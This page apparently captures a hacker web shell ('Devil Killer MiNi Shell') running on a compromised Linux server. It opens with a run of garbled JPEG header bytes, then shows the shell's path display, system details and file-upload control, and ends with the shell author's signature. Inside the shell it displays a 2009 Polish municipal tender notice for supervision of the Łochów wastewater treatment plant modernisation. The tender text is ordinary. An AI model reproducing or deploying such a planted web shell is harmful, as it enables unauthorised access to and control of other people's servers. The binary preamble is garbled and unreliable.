JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090706/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090706/225356-N-2009.html

<p class="kh_header"><b>Łochów: Prowadzenie kompleksowego nadzoru inwestorskiego nad inwestycją modernizacji i rozbudowy oczyszczalni ścieków w Łochowie</b><br>
<b>Numer ogłoszenia: 225356 - 2009; data zamieszczenia: 06.07.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Miejski w Łochowie , Al.  Pokoju 75, 07-130 Łochów, woj. mazowieckie, tel. 025 675 12 35, faks 025 675 12 35.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.gminalochow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Prowadzenie kompleksowego nadzoru inwestorskiego nad inwestycją modernizacji i rozbudowy oczyszczalni ścieków w Łochowie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest prowadzenie kompleksowego nadzoru inwestorskiego nad inwestycją modernizacji i rozbudowy oczyszczalni ścieków w Łochowie.

W ramach projektowanej modernizacji oczyszczalni ścieków przewidziano: 
1). Budowę nowych obiektów technologicznych:
- reaktora wielofunkcyjnego typu HYDROCENTRUM (obiekt nr 11)-umożliwi  
  zwiększenie przepustowości oczyszczalni ścieków do 11500 RLM),
- stacji dmuchaw (obiekt nr 12)- stacja usytuowana jest na projektowanym reaktorze     wielofunkcyjnym, zapewniająca dostarczanie odpowiedniej ilości powietrza do tego reaktora. Stacja wyposażona jest w nowoczesne dmuchawy w obudowach dźwiękoszczelnych), 
- zbiornika retencyjno-uśredniającego i zbiornika osadu nadmiernego z kratą
schodkową i piaskownikiem (obiekt nr 13)- do zbiornika retencyjno - uśredniającego  
 doprowadzone będą ścieki surowe trzema rurociągami tłocznymi, 
 - filtra powietrza (obiekt nr 14), oczyszczający powietrze z miejsc mogących    
   generować nieprzyjemne zapachy ( zbiornik retencyjno-uśredniający ścieków surowych,  
    pomieszczenie stacji zlewnej ścieków dowożonych) ,
- studni pomiarowej ścieków oczyszczonych (obiekt nr 9) - usytuowanej w nowym miejscu, gwarantującym otrzymanie poprawnych odczytów, niezależnie od poziomu wody w kanale melioracyjnym 
- studni wodomierzowej (obiekt nr 10) - wyposażonej w instalację antyskażeniową oraz pomiarową zgodnie z aktualnymi wymaganiami

2). Modernizację lub przebudowę istniejących obiektów technologicznych
- reaktora wielofunkcyjnego typu HYDROCENTRUM (obiekt nr 5) przewiduje się  
   częściową wymianę wyposażenia -( dostosowanie do aktualnego stanu techniki),  
- stacji dmuchaw (obiekt nr 7) - przewiduje się przebudowę i wymianę instalacji m. in.  
   wymianę dmuchaw na dmuchawy nowej generacji w obudowie dźwiękoszczelnej 
- budynku oczyszczalni (obiekt nr 3) - przewiduje się demontaż istniejącej kraty  
schodkowej, a także wymianę instalacji mechanicznego odwadniania osadów ( prasa  
taśmowa, przenośnik osadu odwodnionego, pompa osadu, stacja dozowania  
polielektrolitu), 
- wiaty na osad (obiekt nr 6)- przewiduje się usytuowanie pod istniejącą wiatą  
   separatora piasku oraz dwu pojemników na odpady; na osad i wspólny pojemnik na  
   skratki i piasek, 
- pompowni ścieków (obiekt nr 2 ) - przewiduje się wymianę pomp
Należy tak prowadzić realizację zadania żeby w I kwartale można było użytkować zbiornik retencyjno-uśredniający (obiekt nr 13)
I etap realizacji powinien obejmować: 
- budowa zbiornika retencyjno-uśredniającego i zbiornika osadu nadmiernego zraz z całym osprzętem 
- dostawa i montaż piaskownika poziomo-wirowego, demontaż istniejącego,
- dostawa i montaż separatora piasku typu PSK 25,
- dostawa i montaż prasy taśmowej MONOBELT typu NP12CEK z osprzętem (stacja 2CMP10 + pompa PF-MH12-B1 + mieszacz MSC + zespół ZOW-01 + sprężarka +pomost), demontaż istniejącej prasy,
- dostawa i montaż kraty schodkowej typu OZ-A/700/4 z osłoną termiczną i układem sterowania, demontaż istniejącej,
- dostawa i montaż przenośnika ślimakowego do skratek PS-250,
- dostawa i montaż przenośnika do osadu nadmiernego PS-250,
- modernizacja pompowni ścieków usyt. na terenie oczyszczalni,
- modernizacja wiaty,
- rozbiórka starego punktu zlewnego,
- dostawa i montaż kpl. studni pomiarowej ścieków oczyszczonych z osprzętem.


Zadaniem Wykonawcy będzie nadzorowanie prac budowlano -instalacyjnych.
      Wykonawca będzie zarządzał realizacją inwestycji od czasu przekazania placu budowy do czasu zakończenia robót budowlano-instalacyjnych, przeprowadzenia rozruchu technologicznego, zgłoszenia do użytkowania właściwemu organowi wraz z uzyskaniem prawomocnego pozwolenia na użytkowanie oraz końcowego rozliczenia finansowego inwestycji i przekazanie obiektu użytkownikowi.
      
Obowiązki przydzielone Wykonawcy obejmować będą udzielanie informacji i poleceń Wykonawcy robót budowlanych w miarę postępu pracy, komentowanie propozycji Wykonawcy robót budowlanych, co do sposobu wykonywania pracy, upewnianie się, że materiały i urządzenia dostarczane na budowę oraz jakość wykonanych robót odpowiadają specyfikacjom technicznym wykonania i odbioru robót, uzgadnianie ilości wykonanej pracy oraz sprawdzanie i przekazywanie Zamawiającemu przejściowych i końcowego protokołu odbioru. Podczas administracji umowy  cała komunikacja z Wykonawcą robót budowlanych przechodzi przez Wykonawcę niniejszego zamówienia na nadzór. Obowiązki Wykonawcy sprawującego nadzór  obejmują polecenia tyczące się zarządzania kontraktem, oraz ewentualnej zmiany natury i zakresu prac, ich kosztu i czasu wykonania. 

Głównymi elementami pracy Wykonawcy sprawującego nadzór będą:
1.	sprawowanie funkcji inspektora nadzoru inwestorskiego 
2.	kontrola budżetu i harmonogramu kontraktu
3.	wydawanie zaświadczeń dotyczących: aprobaty, rysunków, prób materiałów i robót, ilości wykonanych robót, płatności itd.,
4.	pomiar i odbiór robót,
5.	dokonanie przekazania placu budowy wykonawcy w formie protokolarnej w obecności kierownika budowy i przedstawiciela zamawiającego i użytkownika obiektu,
6.	organizowanie spotkania wykonawcy zadań z projektantem i przedstawicielem Zamawiającego i użytkownika obiektu w razie potrzeby,
7.	minimum trzy  pobyty tygodniowo na budowie inspektora nadzoru w całym okresie trwania inwestycji, a także każdorazowo na żądanie zamawiającego, projektanta i wykonawcy robót wynikające z potrzeb budowy,
8.	składanie na żądanie Zamawiającego w terminie przez niego ustalonym sprawozdania finansowo-rzeczowego dotyczącego miesiąca poprzedniego, a także harmonogramu finansowo - rzeczowego na dwa kolejne kwartały,
9.	organizowanie i prowadzenie przynajmniej raz w miesiącu spotkań uczestników procesu inwestycyjnego związanych z realizacją inwestycji,
10.	zapewnienie sprawnej organizacji przy odbiorach częściowych, końcowym, gwarancyjnym i pogwarancyjnym,
11.	podjęcia czynności odbioru w nie przekraczalnym terminie:
a)	robót zanikających w terminie 3 dni od daty wpisu w dzienniku budowy,
b)	odbioru częściowego w terminie 7 dni od daty otrzymania powiadomienia,
c)	odbioru końcowego w terminie 14 dni od daty otrzymania powiadomienia,
d)	odbioru gwarancyjnego i pogwarancyjnego - w terminie 14 dni od ustalonej daty,
12.	kontrolowanie rozliczeń budowy,
13.	archiwizacja dokumentacji i korespondencji związanej z realizacją,
14.	zarządzanie ryzykiem (zwłaszcza budowlanym),
15.	sporządzanie raportów o postępie prac:
a)	miesięczne
b)	kwartalne
c)	roczne
16.	korespondencja z wykonawcą,
17.	uzyskania w uzgodnieniu z projektantem akceptacji zamawiającego na roboty dodatkowe lub zamienne w przypadku rezygnacji z określonych robót, które stanowią odstępstwo od zatwierdzonego projektu i od umowy zawartej między zamawiającym a wykonawcą robót inwestycyjnych. Na roboty dodatkowe i nieprzewidziane lub zamienne wymagane jest uzyskanie zgody zamawiającego, następnie należy sporządzić protokół konieczności, protokół typowania robót i kosztorysu tych robót,
18.	ogólnym nadzorze we wszystkich branżach nad realizacją robót,
19.	stałej konsultacji i doradztwie fachowym na rzecz Zamawiającego,
20.	współpracy z nadzorem autorskim, w tym konsultacji w przypadku uzupełnienia dokumentacji wykonawczej,
21.	niezwłocznym informowaniu Zamawiającego o jakichkolwiek
            problemach związanych z realizacją inwestycji,

22.	występowanie w charakterze przedstawiciela zamawiającego wobec projektanta i wykonawcy robót budowlano montażowych, osób trzecich oraz organów uczestniczących w procesie inwestycyjnym w zakresie uzyskania wszelkich uzgodnień wymaganych przepisami budowlanymi przy uzyskaniu pozwolenia na użytkowanie,
23.	dokonanie rozliczenia finansowego całości nadzorowanej inwestycji w terminie 14 dni od daty odbioru końcowego zadania,
24.	uczestniczenia w obowiązkowych przeglądach gwarancyjnych i pogwarancyjnych w okresie rękojmi udzielonej przez wykonawcę robót budowlanych,
25.	uczestniczenia w obowiązkowych przeglądach gwarancyjnych po upływie każdych 12 miesięcy od daty odbioru końcowego.

Ponadto zakres prac, za który odpowiedzialny jest Wykonawca  obejmuje, 
przygotowanie i dostarczenie Zamawiającemu  informacji związanych
z inwestycją wymaganych przez Fundusz Spójności  oraz przez polskie prawo budowlane.

Szczegółowy zakres prowadzenia nadzoru inwestorskiego polega na realizacji obowiązków wynikających z postanowień ustawy z dnia 7 lipca 1994 r. Prawo Budowlane (Dz. U. Nr 207, poz. 2016 z 2003 r. z późn. zm.).
Zamawiający zaleca odbycie wizji  lokalnej placu budowy.
Sprawowanie nadzoru należy zakończyć  sporządzeniem protokołu odbioru po uzyskaniu prawomocnego pozwolenia na użytkowanie rozbudowanego i zmodernizowanego obiektu.
Opis przedmiotu zamówienia określa również dokumentacja projektowa i specyfikacje techniczne, stanowiące załącznik nr 7 do niniejszej SIWZ..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 71.52.00.00-9, 71.63.13.00-3, 71.31.52.00-1.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.09.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> wykonawcy nie są zobowiązani do wniesienia wadium.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> W przedmiotowym postępowaniu mogą wziąć udział Wykonawcy, którzy spełniają następujące  warunki:
a)	posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;
b)	posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia.
Przez spełnienie tych warunków należy rozumieć: 

1.	dysponowanie  co najmniej 3 osobami posiadającymi uprawnienia bez ograniczeń do wykonywania samodzielnych funkcji w budownictwie, zgodnie z ustawą Prawo Budowlane w zakresie wykonywania nadzoru inwestorskiego w tym:
a)	co najmniej jedną osoba posiadającą uprawnienia budowlane w specjalności konstrukcyjno-budowlanej bez ograniczeń, która przynależy do Izby Inżynierów Budownictwa,
b)	co najmniej jedną osobą z uprawnieniami budowlanymi w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych bez ograniczeń, która przynależy do Izby Inżynierów Budownictwa,
c)	co najmniej jedną osobą z uprawnieniami budowlanymi w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych bez ograniczeń, która przynależy do Izby Inżynierów Budownictwa,
2.	wykonanie w okresie ostatnich trzech lat (a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie), przed dniem wszczęcia postępowania - usług polegających na  prowadzeniu minimum 2 kompleksowych nadzorów obiektów budowlanych w branżach: konstrukcyjno-budowlanej, sanitarnej i elektrycznej obiektów budowlanych, w tym co najmniej 1 oczyszczalni ścieków o technologii biologiczno-mechanicznej o przepustowości minimum 400 m3/dobę, potwierdzone referencjami;
c)	znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia,
d)	nie podlegają wykluczeniu z postępowania o udzielenie zamówienia publicznego.


2. Ocena spełniania wymienionych warunków dokonana zostanie zgodnie z formułą spełnia-nie spełnia, w oparciu o informacje zawarte w oświadczeniach i dokumentach jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1.	Wykonawca obowiązany jest do dostarczenia niżej wymienionych dokumentów:

a)	wypełniony formularz ofertowy z wykorzystaniem wzoru, na Załączniku Nr 1 do SIWZ.
b)	oświadczenie o spełnianiu warunków udziału w postępowaniu, określone w art. 22 ust. 1 - załącznik nr 2 do SIWZ
c)	oświadczenie o niepodleganiu  wykluczeniu na podstawie art. 24 ust. 1 i 2 ustawy Prawo zamówień publicznych wzór - załącznik nr  3 do SIWZ;
d)	aktualny wypis z rejestru albo zaświadczenie o wpisie do ewidencji działalności gospodarczej - jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej -   wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert;
e)	aktualne zaświadczenie właściwego naczelnika Urzędu Skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków lub uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawionego nie wcześniej niż 3 miesiące przed upływem terminu składania ofert,
f)	aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne lub społeczne lub uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawionego nie wcześniej niż 3 miesiące przed upływem terminu składania ofert,
g)	wykaz wykonanych usług - w okresie ostatnich 3 lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadających swoim rodzajem i wartością usługom stanowiącym przedmiot niniejszego zamówienia, z podaniem ich wartości, dat wykonania i odbiorców oraz załączeniem dokumentów potwierdzających należyte wykonanie tych robót (referencje). Warunek dotyczący posiadania doświadczenia będzie spełniony, jeśli wykonawca przedstawi wykaz zawierający wykonanie co najmniej 2 kompleksowych nadzorów obiektów budowlanych w branżach: konstrukcyjno-budowlanej, sanitarnej i elektrycznej obiektów budowlanych w tym co najmniej 1 oczyszczalni ścieków o technologii biologiczno-mechanicznej o przepustowości minimum 400 m3/dobę potwierdzone referencjami -załącznik nr 3 do SIWZ;
h)	potencjał kadrowy - załącznik nr 4 do SIWZ - wykaz osób zdolnych do wykonania niniejszego zamówienia, wykonawca winien wykazać w ofercie, że dysponuje: 
1.	co najmniej jedną osoba posiadającą uprawnienia budowlane w specjalności konstrukcyjno-budowlanej bez ograniczeń, która przynależy do Izby Inżynierów Budownictwa,
2.	co najmniej jedną osobą z uprawnieniami budowlanymi w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych bez ograniczeń, która przynależy do Izby Inżynierów Budownictwa,
3.	co najmniej jedną osobą z uprawnieniami budowlanymi w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych bez ograniczeń, która przynależy do Izby Inżynierów Budownictwa,
i)	dokument potwierdzający posiadanie  uprawnień budowlanych w zakresie odpowiadającym przedmiotowi zamówienia w specjalności ogólnobudowlanej,
j)	zaświadczenie z oddziału Izby Inżynierów osoby z uprawnieniami w specjalności ogólnobudowlanej, potwierdzające przynależność do tej izby na dzień składania ofert,
k)	dokument potwierdzający posiadanie  uprawnień budowlanych w zakresie odpowiadającym przedmiotowi zamówienia w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń kanalizacyjnych,
l)	zaświadczenie z oddziału Izby Inżynierów osoby z uprawnieniami w zakresie sanitarnym, potwierdzające przynależność do tej izby na dzień składania ofert,
m)	dokument potwierdzający posiadanie  uprawnień budowlanych w zakresie odpowiadającym przedmiotowi zamówienia w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych,
n)	zaświadczenie z oddziału Izby Inżynierów osoby z uprawnieniami w specjalności elektrycznym, potwierdzające przynależność do tej izby na dzień składania ofert,
o)	pełnomocnictwo - w przypadku podpisania oferty i podpisania kopii dokumentów za zgodność z oryginałem przez osobę,  która nie jest wpisana w dokumencie rejestracyjnym bądź ewidencyjnym, do oferty należy dołączyć odpowiednie pełnomocnictwo uprawniające do podpisania oferty, w formie oryginału albo kopii poświadczonej za zgodność z oryginałem przez Wykonawcę.
p)	pisemne zobowiązanie innych podmiotów do udostępnienia osób zdolnych do wykonania zamówienia, jeżeli w wykazie, o którym mowa w ust. 1 lit. h) wykonawca wskazał osoby, którymi będzie dysponował.

Dokumenty i oświadczenia należy złożyć  w formie oryginałów albo kopii poświadczonych za zgodność z oryginałem przez Wykonawcę. 

W przypadku gdy Wykonawcy wspólnie ubiegają się o udzielenie zamówienia, każdy z wykonawców, musi udokumentować, że nie podlega wykluczeniu na podstawie art. 24 PZP, oferta musi być podpisana w sposób, który prawnie zobowiązuje wszystkich wykonawców występujących wspólnie. Wykonawcy występujący wspólnie muszą ustanowić pełnomocnika (lidera) do reprezentowania ich w postępowaniu albo reprezentowania w postępowaniu i zawarcia umowy o udzielenie niniejszego zamówienia publicznego. Wykonawcy występujący wspólnie muszą łącznie spełniać warunek odnośnie posiadania wiedzy i doświadczenia. Korespondencja oraz rozliczenia dokonywane będą wyłącznie z pełnomocnikiem (liderem). Podmioty występujące wspólnie zobowiązane są do złożenia wraz z ofertą pełnomocnictwa do reprezentowania wszystkich wykonawców wspólnie ubiegających sie o udzielenie zamówienia. Wymagane oświadczenia i dokumenty wskazane w rozdz. VII ust 1 lit. c), e), f) powinny być złożone przez każdy podmiot. Wymaga się aby każdy z Wykonawców spełniał warunki określone w ust. 1 lit a) i d),  natomiast warunki określone w ust. 1 lit. b) i c)  Wykonawcy muszą spełniać wspólnie.

Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, to zgodnie z § 2 ust. 1 rozporządzenia Prezesa rady Ministrów z dnia 19 maja 2006 r. w sprawie rodzajów dokumentów, jakich może żądać zamawiający od wykonawcy , oraz form, w jakich te dokumenty mogą być składane, składa odpowiednie dokumenty wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.gminalochow.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Łochowie, Al. pokoju 75, 07-130 Łochów, pokój nr 17.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 14.07.2009 godzina 10:00, miejsce: Urząd Miejski w Łochowie, Al. pokoju 75, 07-130 Łochów, pokój nr 17.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com